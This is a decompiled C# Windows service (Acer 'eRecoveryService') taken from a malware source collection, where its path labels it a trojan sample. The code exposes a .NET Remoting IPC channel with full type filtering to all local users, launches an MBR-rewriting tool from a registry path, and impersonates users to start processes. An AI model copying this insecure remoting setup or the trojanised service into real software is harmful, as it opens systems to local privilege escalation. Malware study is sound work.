MalwareSourceCode/MSIL/Trojan/Win32/P/Trojan.Win32.Patched.mf-d8d6de6a708417645ef396f90e846eda5ae240e20dd2ceba0b7c9c1e4a6a7d77/Service1.cs

// Decompiled with JetBrains decompiler
// Type: eRecoveryService.Service1
// Assembly: eRecoveryService, Version=2.5.3.6, Culture=neutral, PublicKeyToken=null
// MVID: 08DF666A-8C92-4CCB-869A-390134BB6787
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.Win32.Patched.mf-d8d6de6a708417645ef396f90e846eda5ae240e20dd2ceba0b7c9c1e4a6a7d77.exe

using IERYETF;
using Microsoft.Win32;
using ServiceInterface;
using System;
using System.Collections;
using System.ComponentModel;
using System.IO;
using System.Runtime.InteropServices;
using System.Runtime.Remoting;
using System.Runtime.Remoting.Channels;
using System.Runtime.Remoting.Channels.Ipc;
using System.Runtime.Serialization.Formatters;
using System.Security.Principal;
using System.ServiceProcess;
using System.Timers;

namespace eRecoveryService
{
  public class Service1 : ServiceBase
  {
    private ServerClass eRServer;
    private ETFclass ETFServer;
    private IpcChannel channel;
    private Timer aTimer;
    private IContainer components;

    public Service1()
    {
      this.InitializeComponent();
      this.eRServer = new ServerClass();
      this.ETFServer = new ETFclass();
      RemotingServices.Marshal((MarshalByRefObject) this.eRServer, "ServerObj", typeof (Interface));
      SecurityIdentifier securityIdentifier = new SecurityIdentifier(WellKnownSidType.BuiltinUsersSid, (SecurityIdentifier) null);
      RemotingServices.Marshal((MarshalByRefObject) this.ETFServer, "ETFServerObj", typeof (IERY));
      IDictionary properties = (IDictionary) new Hashtable();
      properties[(object) "name"] = (object) "ipcEr";
      properties[(object) "portName"] = (object) "ipcErServer";
      properties[(object) "authorizedGroup"] = (object) securityIdentifier.Translate(typeof (NTAccount)).ToString();
      BinaryServerFormatterSinkProvider serverSinkProvider = new BinaryServerFormatterSinkProvider();
      serverSinkProvider.TypeFilterLevel = TypeFilterLevel.Full;
      BinaryClientFormatterSinkProvider clientSinkProvider = new BinaryClientFormatterSinkProvider();
      this.channel = new IpcChannel(properties, (IClientChannelSinkProvider) clientSinkProvider, (IServerChannelSinkProvider) serverSinkProvider);
    }

    private void OnTimedEvent(object source, ElapsedEventArgs e)
    {
      if (!ImpersonateUser.IsHiddenPartitionExist())
      {
        ImpersonateUser.DeleteeRecovery();
      }
      else
      {
        RegistryKey registryKey = Registry.LocalMachine.OpenSubKey("Software\\acer\\eRecovery", false);
        string lpCommandLine = (registryKey == null ? "C:\\Acer\\Empowering Technology\\eRecovery" : (registryKey.GetValue("InstallPath") == null ? "C:\\Acer\\Empowering Technology\\eRecovery" : registryKey.GetValue("InstallPath").ToString())) + "\\mbrwrwin.exe reinstall";
        WIN32.PROCESS_INFORMATION lpProcessInformation = new WIN32.PROCESS_INFORMATION();
        WIN32.STARTUPINFO lpStartupInfo = new WIN32.STARTUPINFO();
        WIN32.SECURITY_ATTRIBUTES lpProcessAttributes = new WIN32.SECURITY_ATTRIBUTES();
        WIN32.SECURITY_ATTRIBUTES lpThreadAttributes = new WIN32.SECURITY_ATTRIBUTES();
        lpProcessAttributes.nLength = Marshal.SizeOf((object) lpProcessAttributes);
        lpThreadAttributes.nLength = Marshal.SizeOf((object) lpThreadAttributes);
        WIN32.CreateProcess((string) null, lpCommandLine, ref lpProcessAttributes, ref lpThreadAttributes, false, 0U, IntPtr.Zero, (string) null, ref lpStartupInfo, out lpProcessInformation);
      }
      this.aTimer.Enabled = false;
    }

    private bool FirstRestortBoot()
    {
      RegistryKey registryKey = Registry.LocalMachine.OpenSubKey("Software\\acer\\eRecovery", false);
      string path = (registryKey == null ? "C:\\Acer\\Empowering Technology\\eRecovery" : (registryKey.GetValue("InstallPath") == null ? "C:\\Acer\\Empowering Technology\\eRecovery" : registryKey.GetValue("InstallPath").ToString())) + "\\FirstRestoreBoot.ini";
      if (!File.Exists(path))
        return false;
      File.Delete(path);
      return true;
    }

    protected override void OnStart(string[] args)
    {
      this.eRServer.GetSystemVolumnInfo();
      IChannel channel = ChannelServices.GetChannel("ipcErServer");
      if (channel != null)
        ChannelServices.UnregisterChannel(channel);
      if (this.channel != null)
        ChannelServices.RegisterChannel((IChannel) this.channel, true);
      this.aTimer = new Timer();
      this.aTimer.Elapsed += new ElapsedEventHandler(this.OnTimedEvent);
      this.aTimer.Interval = 2000.0;
      this.aTimer.Enabled = true;
    }

    protected override void OnStop()
    {
      if (this.channel == null)
        return;
      ChannelServices.UnregisterChannel((IChannel) this.channel);
    }

    protected override void OnCustomCommand(int command)
    {
      switch (command)
      {
        case 187:
          ImpersonateUser.ImpersonateUserToCreateProcessSilent();
          break;
        case 188:
          ImpersonateUser.ImpersonateUserToCreateProcess();
          break;
      }
      base.OnCustomCommand(command);
    }

    protected override void Dispose(bool disposing)
    {
      if (disposing && this.components != null)
        this.components.Dispose();
      base.Dispose(disposing);
    }

    private void InitializeComponent()
    {
      this.components = (IContainer) new Container();
      this.ServiceName = nameof (Service1);
    }
  }
}